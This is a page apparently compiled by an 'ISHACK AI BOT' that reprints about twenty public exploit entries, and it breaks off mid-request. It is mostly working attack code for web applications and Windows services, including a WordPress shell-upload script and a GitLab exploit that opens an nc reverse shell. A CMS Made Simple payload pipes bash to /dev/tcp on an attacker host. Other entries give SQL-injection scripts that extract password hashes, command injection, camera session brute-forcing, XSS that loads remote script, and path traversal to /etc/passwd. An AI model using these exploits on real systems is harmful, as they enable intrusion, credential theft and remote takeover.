ISHACK AI BOT

# Exploit Title: WordPress Plugin Adning Advertising 1.5.5 - Arbitrary File Upload # Google Dork: inurl:/wp-content/plugins/angwp # Date: 23/12/2020 # Exploit Author: spacehen # Vendor Homepage: http://adning.com/ # Version: <1.5.6 # Tested on: Ubuntu 20.04.1 LTS (x86) import os.path from os import path import json import requests; import sys def print_banner(): print("Adning Advertising < 1.5.6 - Arbitrary File Upload") print("Author -> space_hen (www.lunar.sh)") def print_usage(): print("Usage: python3 exploit.py [target url] [php file]") print("Ex: python3 exploit.py https://example.com ./shell.php") def vuln_check(uri): response = requests.get(uri) raw = response.text if ("no files found" in raw): return True; else: return False; def main(): print_banner() if(len(sys.argv) != 3): print_usage(); sys.exit(1); base = sys.argv[1] file_path = sys.argv[2] ajax_action = '_ning_upload_image' admin = '/wp-admin/admin-ajax.php'; uri = base + admin + '?action=' + ajax_action ; check = vuln_check(uri); if(check == False): print("(*) Target not vulnerable!"); sys.exit(1) if( path.isfile(file_path) == False): print("(*) Invalid file!") sys.exit(1) files = {'files[]' : open(file_path)} data = { "allowed_file_types" : "php,jpg,jpeg", "upload" : json.dumps({"dir" : "../"}) } print("Uploading Shell..."); response = requests.post(uri, files=files, data=data ) file_name = path.basename(file_path) if(file_name in response.text): print("Shell Uploaded!") if(base[-1] != '/'): base += '/' print(base + file_name) else: print("Shell Upload Failed") sys.exit(1) main();

# Exploit Title: Baby Care System 1.0 - 'roleid' SQL Injection # Exploit Author: Vijay Sachdeva # Date: 2020-12-23 # Vendor Homepage: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14622&title=Baby+Care+System+in+PHP%2FMySQLi+with+Full+Source+Code+ # Affected Version: Version 1 # Tested on Kali Linux Step 1. Log in to the application with admin credentials. Step 2. Click on "MENUS" on the left side and then edit any "Page Role". Step 3. On the edit page, the URL should be: http://localhost/BabyCare-master/admin.php?id=pagerole&action=edit&roleid=7 Step 4. Run sqlmap on the URL where the "roleid" parameter is given sqlmap -u " http://192.168.1.240/BabyCare-master/admin.php?id=pagerole&action=edit&roleid=7" --banner --- Parameter: roleid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=pagerole&action=edit&roleid=8' AND 3077=3077 AND 'IPDn'='IPDn Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=pagerole&action=edit&roleid=8' AND (SELECT 2834 FROM(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (ELT(2834=2834,1))),0x71717a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'jnFT'='jnFT Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=pagerole&action=edit&roleid=8' AND (SELECT 4559 FROM (SELECT(SLEEP(5)))jaEa) AND 'iBGT'='iBGT Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: id=pagerole&action=edit&roleid=-2488' UNION ALL SELECT CONCAT(0x7170767871,0x7577594366596d7077424f5746685366434a5244775565756b7a41566d63546c5156564e6d67556e,0x71717a6271),NULL,NULL,NULL-- - --- [05:32:00] [INFO] the back-end DBMS is MySQL [05:32:00] [INFO] fetching banner back-end DBMS: MySQL >= 5.0 (MariaDB fork) banner: '10.3.24-MariaDB-2' --- [08:18:34] [INFO] the back-end DBMS is MySQL [08:18:34] [INFO] fetching banner back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) banner: '10.3.24-MariaDB-2' --- Step 5. Sqlmap should inject the web-app successfully which leads to information disclosure.

# Exploit Title: WordPress Plugin WP-PostRatings 1.86 - 'postratings_image' Cross-Site Scripting # Date: 20-12-2018 # Software Link: https://wordpress.org/plugins/wp-postratings/ # Exploit Author: Park Won Seok # Version: wp-postratings.1.86 # Tested on: Windows 10 x64 # description: # A Stored Cross-site scripting (XSS) was discovered in wordpress plugins wp-postratings.1.86 # One parameters(postratings_image) have Cross-Site Scripting. # POC # XSS Stored POST http://localhost/wordpress/wp-admin/admin.php?page=wp-postratings/postratings-options.php HTTP/1.1 Host: localhost Content-Length: 1765 Cache-Control: max-age=0 Origin: localhost Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://localhost/wordpress/wp-admin/admin.php?page=wp-postratings%2Fpostratings-options.php Accept-Encoding: gzip, deflate Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: wordpress_14f4416c910366e4d17f08fa58e71587=wordpress%7C1545577867%7CZwsmD4U29rPGA853ANHO1NUarjSBZi6ul0sDVvkKLwr%7Cff47715fb398e65023b74d3aad0d0429061e90422614399cf1cffb88df424173; wp-settings-1=deleted; wp-settings-time-1=1545201993; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_14f4416c910366e4d17f08fa58e71587=wordpress%7C1545577867%7CZwsmD4U29rPGA853ANHO1NUarjSBZi6ul0sDVvkKLwr%7Cd63f851c891cd0792c2c7e5a2d62342ffb57501777f1e8f0e9c13b8ff0daacc2 Connection: close _wpnonce=b841885588&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dwp-postratings%2Fpostratings-options.php&postratings_customrating=0&postratings_template_vote=%25RATINGS_IMAGES_VOTE%25+%28%3Cstrong%3E%25RATINGS_USERS%25%3C%2Fstrong%3E+votes%2C+average%3A+%3Cstrong%3E%25RATINGS_AVERAGE%25%3C%2Fstrong%3E+out+of+%25RATINGS_MAX%25%29%3Cbr+%2F%3E%25RATINGS_TEXT%25&postratings_template_text=%25RATINGS_IMAGES%25+%28%3Cem%3E%3Cstrong%3E%25RATINGS_USERS%25%3C%2Fstrong%3E+votes%2C+average%3A+%3Cstrong%3E%25RATINGS_AVERAGE%25%3C%2Fstrong%3E+out+of+%25RATINGS_MAX%25%2C+%3Cstrong%3Erated%3C%2Fstrong%3E%3C%2Fem%3E%29&postratings_template_permission=%25RATINGS_IMAGES%25+%28%3Cem%3E%3Cstrong%3E%25RATINGS_USERS%25%3C%2Fstrong%3E+votes%2C+average%3A+%3Cstrong%3E%25RATINGS_AVERAGE%25%3C%2Fstrong%3E+out+of+%25RATINGS_MAX%25%3C%2Fem%3E%29%3Cbr+%2F%3E%3Cem%3EYou+need+to+be+a+registered+member+to+rate+this.%3C%2Fem%3E&postratings_template_none=%25RATINGS_IMAGES_VOTE%25+%28No+Ratings+Yet%29%3Cbr+%2F%3E%25RATINGS_TEXT%25&postratings_template_highestrated=%3Cli%3E%3Ca+href%3D%22%25POST_URL%25%22+title%3D%22%25POST_TITLE%25%22%3E%25POST_TITLE%25%3C%2Fa%3E+%25RATINGS_IMAGES%25+%28%25RATINGS_AVERAGE%25+out+of+%25RATINGS_MAX%25%29%3C%2Fli%3E&postratings_template_mostrated=%3Cli%3E%3Ca+href%3D%22%25POST_URL%25%22++title%3D%22%25POST_TITLE%25%22%3E%25POST_TITLE%25%3C%2Fa%3E+-+%25RATINGS_USERS%25+votes%3C%2Fli%3E& [postratings_image=stars\"onerror=alert(1) --]&postratings_max=2&postratings_richsnippet=0&postratings_ratingstext%5B%5D=1+Star&postratings_ratingsvalue%5B%5D=%2B1&postratings_ratingstext%5B%5D=&postratings_ratingsvalue%5B%5D=0&postratings_ajax_style_loading=1&postratings_ajax_style_fading=1&postratings_allowtorate=2&postratings_logging_method=3&Submit=Save+Changes

# Exploit Title: Apartment Visitors Management System 1.0 - Authentication Bypass # Date: 2020-12-24 # Exploit Author: Kshitiz Raj(manitorpotterk) # Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395 # Version: V1.0 # Tested on: Windows 10/Kali Linux Step 1 - Go to url http://localhost/avms/index.php <http://localhost/avms/index.php>* Step 2 – Enter Username :- ' or '1'='1'# * Step 3 - Enter Password - anything*

# Exploit Title: MiniTool ShadowMaker 3.2 - 'MTAgentService' Unquoted Service Path # Discovery by: Thalia Nieto # Discovery Date: 02/01/21 # Vendor Homepage: https://www.minitool.com # Software Link: https://www.minitool.com/backup/thanks-download.html?v=sm-free&r=download-center/ # Tested Version: 3.2 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, name | findstr /i "MTAgentService" MTAgentService MTAgentService C:\Program Files\MiniTool ShadowMaker\AgentService.exe # Service info: C:\>sc qc "MTAgentService" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: MTAgentService TIPO : 110 WIN32_OWN_PROCESS (interactive) TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\MiniTool ShadowMaker\AgentService.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : MTAgentService DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: GitLab 11.4.7 RCE (POC) # Date: 24th December 2020 # Exploit Author: Norbert Hofmann # Exploit Modifications: Sam Redmond, Tam Lai Yin # Original Author: Mohin Paramasivam # Software Link: https://gitlab.com/ # Environment: GitLab 11.4.7, community edition # CVE: CVE-2018-19571 + CVE-2018-19585 #!/usr/bin/python3 import requests from bs4 import BeautifulSoup import argparse import random parser = argparse.ArgumentParser(description='GitLab 11.4.7 RCE') parser.add_argument('-u', help='GitLab Username/Email', required=True) parser.add_argument('-p', help='Gitlab Password', required=True) parser.add_argument('-g', help='Gitlab URL (without port)', required=True) parser.add_argument('-l', help='reverse shell ip', required=True) parser.add_argument('-P', help='reverse shell port', required=True) args = parser.parse_args() username = args.u password = args.p gitlab_url = args.g + ":5080" local_ip = args.l local_port = args.P session = requests.Session() # Get Authentication Token r = session.get(gitlab_url + "/users/sign_in") soup = BeautifulSoup(r.text, features="lxml") token = soup.findAll('meta')[16].get("content") print(f"[+] authenticity_token: {token}") login_form = { "authenticity_token": token, "user[login]": username, "user[password]": password, "user[remember_me]": "0" } r = session.post(f"{gitlab_url}/users/sign_in", data=login_form) if r.status_code != 200: exit(f"Login Failed:{r.text}") # Create project import_url = "git%3A%2F%2F%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A6379%2Ftest%2F.git" project_name = f'project{random.randrange(1, 10000)}' project_url = f'{gitlab_url}/{username}' print(f"[+] Creating project with random name: {project_name}") form = """\nmulti sadd resque:gitlab:queues system_hook_push lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|""" + f'nc {local_ip} {local_port} -e /bin/bash' + """ \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1608799993.1234567,\\"enqueued_at\\":1608799993.1234567}" exec exec exec\n""" r = session.get(f"{gitlab_url}/projects/new") soup = BeautifulSoup(r.text, features="lxml") namespace_id = soup.find( 'input', {'name': 'project[namespace_id]'}).get('value') project_token = soup.findAll('meta')[16].get("content") project_token = project_token.replace("==", "%3D%3D") project_token = project_token.replace("+", "%2B") payload = f"utf8=%E2%9C%93&authenticity_token={project_token}&project%5Bimport_url%5D={import_url}{form}&project%5Bci_cd_only%5D=false&project%5Bname%5D={project_name}&project%5Bnamespace_id%5D={namespace_id}&project%5Bpath%5D={project_name}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0" cookies = { 'sidebar_collapsed': 'false', 'event_filter': 'all', 'hide_auto_devops_implicitly_enabled_banner_1': 'false', '_gitlab_session': session.cookies['_gitlab_session'], } headers = { 'User-Agent': 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US);', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Referer': f'{gitlab_url}/projects', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '398', 'Connection': 'close', 'Upgrade-Insecure-Requests': '1', } print("[+] Running Exploit") r = session.post( gitlab_url+'/projects', data=payload, cookies=cookies, headers=headers, verify=False) if "The change you requested was rejected." in r.text: exit('Exploit failed, check input params') print('[+] Exploit completed successfully!')

# Exploit Title: Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC) # Date: 22.12.2020 # Software Link: http://www.tucows.com/download/windows/files/ezcdsetup.exe # Exploit Author: Achilles # Tested Version: 4.13 # Tested on: Windows 7 x64 Sp1 # 1.- Run python code :Creator.py # 2.- Open EVIL.txt and copy content to clipboard # 3.- Open Easy CD & DVD Cover Creator.exe # 4.- Press Unlock Now # 4.- Paste the content of EVIL.txt into the Field: 'Serial Number' # 5.- Press 'Continue'and you will see a crash. #!/usr/bin/env python buffer = "\x41" * 6000 try: open("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"

# Exploit Title: Mantis Bug Tracker 2.24.3 - 'access' SQL Injection # Date: 30/12/2020 # Exploit Author: EthicalHCOP # Vendor Homepage: https://www.mantisbt.org/ # Version: 2.24.3 # CVE: CVE-2020-28413 import requests, sys, time from lxml import etree proxies = { "http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080", } def Hacer_Peticion(query): home = "" url = home+"/api/soap/mantisconnect.php" headers = {'content-type': 'text/xml', 'SOAPAction': url+'"/mc_project_get_users"'} mantis_db_user = "" mantis_db_pass = "" body = """<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:man="http://futureware.biz/mantisconnect"> <soapenv:Header/> <soapenv:Body> <man:mc_project_get_users soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <username xsi:type="xsd:string">"""+mantis_db_user+"""</username> <password xsi:type="xsd:string">"""+mantis_db_pass+"""</password> <project_id xsi:type="xsd:integer">0</project_id> <access xsi:type="xsd:string">"""+query+"""</access> </man:mc_project_get_users> </soapenv:Body> </soapenv:Envelope>""" response = requests.post(url, data=body, headers=headers, verify=False) #response = requests.post(url, data=body, headers=headers, proxies=proxies, verify=False) parser = etree.XMLParser(remove_blank_text=True) xml = etree.XML(response.content, parser) xml = etree.tostring(xml) return(str(xml)) def Cantidad_Usuarios_Mantis(): query = "0 union all select concat('-',(select count(*) " \ "from mantis_user_table),'0'),2,3,4 order by id asc limit 1" xml = Hacer_Peticion(query) txt = xml.split("integer") txt = txt[1].split("id") registros = str(str(str(txt[0])[:-2])[-2:])[:-1] return(registros) def Obtener_Id(usr_pos): query = "0 union all select concat((SELECT id FROM mantis_user_table " \ "order by id asc limit 0,1),'0'),2,3,4 limit "+str(usr_pos)+",1" xml = Hacer_Peticion(query) txt = xml.split("integer") txt = txt[1].split("id") id = str(str(txt[0])[:-2])[-1:] name = str(str(txt[1])[29:]).split("</name>")[0] return (id+"-"+name) def brute_force(data): charts = "abcdefghijklmnopqrstuvwxyz0123456789" passw = "" id = data.split("-")[0] name = data.split("-")[1] for cp in range (1,33,1): for c in charts: print(f"\rHash: {passw}", end="") time.sleep(0.00001) sys.stdout.flush() query = "0 union all select (select if(substring((select binary(password) " \ "from mantis_user_table where id = " + str(id) + ")," + str(cp) + ",1)='" + str(c) + "','0','900000000000000000000')), 2,3,4 order by id asc limit 1" xml = Hacer_Peticion(query) txt = xml.split("integer") txt = txt[1].split("id") r_id = str(str(txt[0])[:-2])[-1:] if(r_id=="0"): passw = passw + str(c) break print(f"\r", end="") sys.stdout.flush() print(name+": "+passw) def main(): cantidad_users = Cantidad_Usuarios_Mantis() print("Cantidad usuarios en db: "+str(cantidad_users)) print("Obteniendo Hashes...") for x in range(0,int(cantidad_users),1): brute_force(Obtener_Id(x)) if __name__ == "__main__": main()

# Exploit Title: 4images v1.7.11 - 'Profile Image' Stored Cross-Site Scripting # Date: 30-12-2020 # Exploit Author: Ritesh Gohil # Vendor Homepage: https://www.4homepages.de/ # Software Link: https://www.4homepages.de/download-4images # Version: 1.7.11 # Tested on: Windows 10/Kali Linux Vulnerable Parameters: Profile Image. Attack Vector: This vulnerability can results attacker to inject the XSS payload into the IMAGE URL and each time any user will go to that URL, the XSS triggers, and the attacker can able to steal the cookie according to the crafted payload. Steps-To-Reproduce: 1. Login into 4images admin panel. 2. Now go to the add images tab. 3. Now paste the below payload in the URL field. ritesh"><img src=x onerror=confirm(1)> 4. Now click on add button. 5. The XSS will be triggered.

# Exploit Title: Wordpress Core 5.2.2 - 'post previews' XSS # Date: 31/12/2020 # Exploit Author: gx1 <g.per45[at]gmail.com> # Vulnerability Discovery: Simon Scannell # Vendor Homepage: https://wordpress.com/ # Software Link: https://github.com/WordPress/WordPress # Version: <= 5.2.2 # Tested on: any # CVE: CVE-2019-16223 # References: https://nvd.nist.gov/vuln/detail/CVE-2019-16223 https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/ Description: WordPress before 5.2.3 allows XSS in post previews by authenticated users. Technical Details and Exploitation: The vulnerability is due to two condition: 1. wp_kses_bad_protocol_once() has an issue with URL sanitization that can be passed and can lead to cross-site scripting vulnerability: the function sanitizes bad protocols, and applies a convertion of HTML entities to avoid bypass techniques; anyway, in vulnerable versions, it only checks for html entities after two points, as it is possible to observe by the applied fix: ============================================================================================================================================ function wp_kses_bad_protocol_once( $string, $allowed_protocols, $count = 1 ) { + $string = preg_replace( '/(&#0*58(?![;0-9])|&#x0*3a(?![;a-f0-9]))/i', '$1;', $string ); # APPLIED FIX AFTER VULNERABILITY DETECTION $string2 = preg_split( '/:|&#0*58;|&#x0*3a;/i', $string, 2 ); if ( isset( $string2[1] ) && ! preg_match( '%/\?%', $string2[0] ) ) { ============================================================================================================================================ This allows an attacker to inject attack strings such as: ============================================================================================================================================ <a href="javascript&#58alert(document.domain)">Example Attack</a> ============================================================================================================================================ Anyway, Wordpress protects against this attack because it converts any type of html entities during the rendering of posts. In a particular case, during preview, it is possible to inject html entities in a URL. That is the second condition. 2. During preview, get_the_content() function in post-template.php replaces URL encoded characters with a corresponding HTML entity: ============================================================================================================================================ function get_the_content( $more_link_text = null, $strip_teaser = false ) { ... if ( $preview ) // Preview fix for JavaScript bug with foreign languages. $output = preg_replace_callback( '/\%u([0-9A-F]{4})/', '_convert_urlencoded_to_entities', $output ); return $output; } function _convert_urlencoded_to_entities( $match ) { return '&#' . base_convert( $match[1], 16, 10 ) . ';'; } ============================================================================================================================================ For this reason, it is possible to send URL encoded strings that will be converted in HTML entities during preview. HTML entities can be crafted to bypass wp_ses_bad_protocol_once() function due to issue described in condition 1. Proof Of Concept: 1. Create a new post 2. Insert in code editor the following HTML PoC code: <a href="javascript%u003Aalert(/XSS/)">poc</a> 3. Click on preview and click the "poc" link Solution: Upgrade Wordpress to version >= 5.2.3

# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution # Date: 27-12-2020 # Exploit Author: Musyoka Ian # Vendor Homepage:https://github.com/cemtan/sar2html # Software Link: https://sourceforge.net/projects/sar2html/ # Version: 3.2.1 # Tested on: Ubuntu 18.04.1 #!/usr/bin/env python3 import requests import re from cmd import Cmd url = input("Enter The url => ") class Terminal(Cmd): prompt = "Command => " def default(self, args): exploiter(args) def exploiter(cmd): global url sess = requests.session() output = sess.get(f"{url}/index.php?plot=;{cmd}") try: out = re.findall("<option value=(.*?)>", output.text) except: print ("Error!!") for ouut in out: if "There is no defined host..." not in ouut: if "null selected" not in ouut: if "selected" not in ouut: print (ouut) print () if __name__ == ("__main__"): terminal = Terminal() terminal.cmdloop()

# Exploit Title: Advanced Comment System 1.0 - 'ACS_path' Path Traversal # Date: Fri, 11 Dec 2020 # Exploit Author: Francisco Javier Santiago Vázquez aka "n0ipr0cs" # Vendor Homepage: Advanced Comment System - ACS # Version: v1.0 # CVE: CVE-2020-35598 http://localhost/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00

# Exploit Title: Knockpy 4.1.1 - CSV Injection # Author: Dolev Farhi # Date: 2020-12-29 # Vendor Homepage: https://github.com/guelfoweb/knock # Version : 4.1.1 # Tested on: Debian 9.13 Knockpy, as part of its subdomain brute forcing flow of a remote domain, issues a HEAD request to the server to fetch details such as headers, status code, etc. The data then gets reflected when issuing the -c flag to store as a CSV file with the Server HTTP Response Header unfiltered. Vulnerable code segment(s) # knockpy.py # row = ip+'\t'+str(data['status'])+'\t'+'host'+'\t'+str(data['hostname'])+get_tab(data['hostname'])+str(server_type) # subdomain_csv_list.append(ip+','+str(data['status'])+','+'host'+','+str(data['hostname'])+','+str(server_type)) # modules/save_report.py # if fields: # csv_report += 'ip,status,type,domain_name,server\n' # for item in report: # csv_report += item + '\n' # report = csv_report 1. Example malicious Nginx config to return CSV formula headers: http { ... server_tokens off; more_set_headers 'Server: =1336+1'; ... } 2. Tester runs Knoockpy root@host:~/# python knockpy/knockpy.py -c test.local + checking for virustotal subdomains: SKIP VirusTotal API_KEY not found + checking for wildcard: NO + checking for zonetransfer: NO + resolving target: YES - scanning for subdomain... Ip Address Status Type Domain Name Server ---------- ------ ---- ----------- ------ 127.0.0.1 200 host appserver.test.local =1336+1 CSV result root@host:~/# cat test_local.csv 127.0.0.1,200,host,appserver.test.local,=1336+1 127.0.0.1,200,host,www.test.local,=1336+1

# Exploit Title: Click2Magic 1.1.5 - Stored Cross-Site Scripting # Exploit Author: Shivam Verma(cyb3r_n3rd) # Date: 2020-12-25 # Google Dork: N/A # Vendor Homepage: https://www.click2magic.com/user/agent/index # Software Link: https://www.click2magic.com # Version: 1.1.5 # Category: Web Application # Tested on: Kali Linux Attack Vector: This Vulnerability Leads an Attacker to Inject Malicious Payloads in Chat section each time admin/user visits and manages the user data, The Malicious Payload(XSS) triggers and attacker can capture the admin cookies and access the users Data Step 1. visit the link Step 2. Start a new Chat Step 3. When ask for name paste your Xss Payload Step 4. Wait for the Administrator to click on Your link Step 5. You will receive Admin Cookie Everytime he Process the Request --- XSS Payload: "><script src=https://.xss.ht></script>

# Exploit Title: Subrion CMS 4.2.1 - 'avatar[path]' XSS # Date: 2020-12-15 # Exploit Author: icekam # Vendor Homepage: https://subrion.org/ <https://www.icekam.com/> # Software Link: https://github.com/intelliants/subrion # Version: Subrion CMS 4.2.1 # CVE : CVE-2020-35437 stored xss vulnerability in /_core/profile/. Reproduce through the avatar[path] parameter in post /_core/profile/ url. payload:"><sCrIpT>alert(1)</sCrIpT> https://github.com/intelliants/subrion/issues/880

# Exploit Title: CMS Made Simple 2.2.15 - RCE (Authenticated) # Author: Andrey Stoykov # Vendor Homepage: https://www.cmsmadesimple.org/ # Software Link: https://www.cmsmadesimple.org/downloads/cmsms # Version: 2.2.15 # Tested on: Debian 10 LAMPP # Exploit and Detailed Info: https://infosecresearchlab.blogspot.com/2020/12/cms-made-simple-2215-authenticated-rce.html Vulnerability is present at "editusertag.php" at line #93 where the user input is in eval() PHP function. // Vulnerable eval() code if (eval('function testfunction'.rand().'() {'.$code."\n}") === FALSE) { Reproduction Steps: 1. Login as administrator user and navigate to Extensions->User Defined Tags 2. Add code with the payload of: exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.56.1/4444 0>&1'"); 3. Click on the newly created User Defined Tag and use the Run function RCE will be achieved: astoykov@Lubuntu:~$ nc -kvlp 4444 nc: getnameinfo: Temporary failure in name resolution Connection received on 192.168.56.132 53690 id uid=1(daemon) gid=1(daemon) groups=1(daemon)

# Exploit Title: Intel(R) Matrix Storage Event Monitor x86 8.0.0.1039 - 'IAANTMON' Unquoted Service Path # Date: 2021-01-04 # Exploit Author: Geovanni Ruiz # Vendor Homepage: https://www.intel.com # Software Version: 8.0.0.1039 # File Version: 8.0.0.1039 # Tested on: Microsoft® Windows Vista Business 6.0.6001 Service Pack 1 x64es # 1. To find the unquoted service path vulnerability C:\>wmic service where 'name like "%IAANTMON%"' get name, displayname, pathname, startmode, startname DisplayName Name PathName StartMode StartName Intel(R) Matrix Storage Event Monitor IAANTMON C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTMon.exe Auto LocalSystem # 2. To check service info: C:\>sc qc "IAANTMON" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: IAANTMON TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTMon.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Intel(R) Matrix Storage Event Monitor DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem # 3. Exploit: To exploit this vulnerability an attacker requires to drop a malicious executable into the service path undetected by the OS in order to gain SYSTEM privileges.

# Exploit Title: IncomCMS 2.0 - Insecure File Upload # Google Dork: intext:"Incom CMS 2.0" # Date: 07.12.2020 # Exploit Author: MoeAlBarbari # Vendor Homepage: https://www.incomcms.com/ # Version: 2.0 # Tested on: BackBox linux # CVE: CVE-2020-29597 <!DOCTYPE html> <html> <head> <title>Upload your files</title> </head> <body> <form enctype="multipart/form-data" action="http://www.example.com/incom/modules/uploader/showcase/script.php" method="POST"> <p>Upload your file</p> <input type="file" name="Filedata"></input><br /> <input type="submit" value="Upload"></input> </form> </body> </html>

# Exploit Title: Arteco Web Client DVR/NVR - 'SessionId' Brute Force # Date: 16.11.2020 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.arteco-global.com #!/usr/bin/env python3 # # # Arteco Web Client DVR/NVR 'SessionId' Cookie Brute Force Session Hijacking Exploit # # # Vendor: Arteco S.U.R.L. # Product web page: https://www.arteco-global.com # Affected version: n/a # # Summary: Arteco DVR/NVR is a mountable industrial surveillance server # ideal for those who need to manage IP video surveillance designed for # medium to large installations that require high performance and reliability. # Arteco can handle IP video sources from all major international manufacturers # and is compatible with ONVIF and RTSP devices. # # Desc: The Session ID 'SessionId' is of an insufficient length and can be # exploited by brute force, which may allow a remote attacker to obtain a # valid session, bypass authentication and disclose the live camera stream. # # Tested on: Microsoft Windows 10 Enterprise # Apache/2.4.39 (Win64) OpenSSL/1.0.2s # Apache/2.2.29 (Win32) mod_fastcgi/2.4.6 mod_ssl/2.2.29 OpenSSL/1.0.1m # Arteco-Server # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2020-5613 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5613.php # # # 16.11.2020 # import sys,requests class BrutusCookius: def __init__(self): self.validate=None self.cookies=None# self.params=None## self.stream=None## self.path=None#### self.cgi=None##### self.ip=None###### self.op=None###### def check(self): print('Usage: ./arteco.py IP') exit(9) def bro(self): if len(sys.argv) !=2: self.check() else: self.ip=sys.argv[1] print('[+] Target IP: '+self.ip) if not 'http' in self.ip: self.ip='http://{}'.format(self.ip) def force(self): # Check the Set-Cookie on the target and determine the length (varies per model/version) # Cookie: SessionId=15800 - range(10000,100000) # Cookie: SessionId=8350 - range(1000,10000) # Cookie: SessionId=502 - range(100,1000) self.op = range(17129,17149) # Tweak for j in self.op: session=requests.session() self.cookies=dict(SessionId=str(j)) sys.stdout.write('[+] Trying ID: '+str(j)) self.path='/arteco-mobile/' self.cgi='camera.fcgi' self.params='?serverId=1&camera=2&mode=1&szx=5&szy=5&qty=15&fps=1' self.validate=session.get(self.ip+self.path+self.cgi+self.params, cookies=self.cookies).headers if not 'artecomobile' in str(self.validate): print(' - NOPE.') else: print(' - BINGO!!!') print('[+] Active session found: '+str(j)) print('[+] Use the cookie: SessionId='+str(j)) exit(9) print('[!] Sorry, no valid session found.') def main(self): self.bro() self.force() if __name__ == '__main__': BrutusCookius().main()

# Exploit Title: WordPress Plugin Stripe Payments 2.0.39 - 'AcceptStripePayments-settings[currency_code]' Stored XSS # Date: 04-01-2021 # Software Link: https://wordpress.org/plugins/stripe-payments/#developers # Exploit Author: Park Won Seok # Contact: [email protected] # Category: Webapps # Version: stripe-payments (Ver_2.0.39) # Tested on: Windows 10 x64 # description: # A Stored Cross-site scripting (XSS) was discovered in wordpress plugins stripe-payments (Ver_2.0.39) # Vulnerability parameters : "AcceptStripePayments-settings[currency_code]" have Cross-Site Scripting. # POC - Stored Cross-Site Scripting POST /wp-admin/options.php HTTP/1.1 Host: localhost Content-Length: 5786 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http:// localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.31.131/wp-admin/edit.php?post_type=asp-products&page=stripe-payments-settings Accept-Encoding: gzip, deflate Accept-Language: ko,en-US;q=0.9,en;q=0.8 Cookie: 